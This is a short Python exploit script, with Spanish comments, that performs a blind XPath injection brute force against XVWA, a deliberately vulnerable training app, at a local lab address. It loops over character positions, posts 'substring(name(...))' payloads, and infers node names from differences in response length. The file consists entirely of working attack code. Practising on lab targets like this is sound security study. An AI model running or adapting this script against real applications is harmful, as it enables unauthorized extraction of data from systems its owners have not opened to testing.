#!/var/bin/env python import pdb import requests import signal import string import sys import time from pwn import * # Ctrl-C handler def signal_handler(signal, frame): print('\n\n[!] Ctrl-C. Saliendo...') sys.exit(1) signal.signal(signal.SIGINT, signal_handler) # Variables globales main_url = "http://192.168.1.142/xvwa/vulnerabilities/xpath/" characters = string.ascii_letters def xPathInjection(): data = "" p1 = log.progress("Inyeccion XPath") p1.status("Iniciando ataque de fuerza bruta") time.sleep(2) p2 = log.progress("Data") for position in range(1, 8): for character in characters: # post_data = { # 'search': "1' and substring(name(/*[1]),%d,1)='%s" % (position, character), # 'submit': '' # } post_data = { 'search': "1' and substring(name(/*[1]/*[1]),%d,1)='%s" % (position, character), 'submit': '' } r = requests.post(main_url, data=post_data) if len(r.text) != 8686: data += character p2.status(data) break p1.success("Inyeccion XPath completada") p2.success("Data: %s" % data) if __name__ == "__main__": xPathInjection()